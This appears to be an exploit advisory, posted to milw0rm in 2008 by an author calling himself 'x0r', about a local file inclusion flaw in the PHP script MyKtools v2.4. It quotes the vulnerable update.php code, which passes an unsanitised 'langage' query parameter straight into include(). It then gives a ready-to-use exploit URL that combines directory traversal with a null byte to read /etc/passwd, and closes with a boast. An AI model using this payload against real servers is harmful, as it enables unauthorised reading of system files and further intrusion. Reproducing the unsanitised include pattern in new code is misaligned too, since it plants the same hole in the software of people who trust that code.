28 lines
No EOL
450 B
Text
28 lines
No EOL
450 B
Text
##############
|
|
# Autor: x0r
|
|
#
|
|
# Email: evolutionteam.x0[at]gmail[dot]com
|
|
#
|
|
# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
|
|
#
|
|
# Bug: LFI
|
|
##############
|
|
|
|
Bug:
|
|
|
|
In \update.php
|
|
|
|
// Include du fichier langue
|
|
if ($_GET['langage'])
|
|
{
|
|
$langue = $_GET['langage'];
|
|
include ("lang/".$langue.".php");
|
|
}
|
|
|
|
Exploit: \update.php?langage=../../../../../../etc/passwd%00
|
|
|
|
p0wn3d Beby.
|
|
|
|
-=EOF=-
|
|
|
|
# milw0rm.com [2008-10-27] |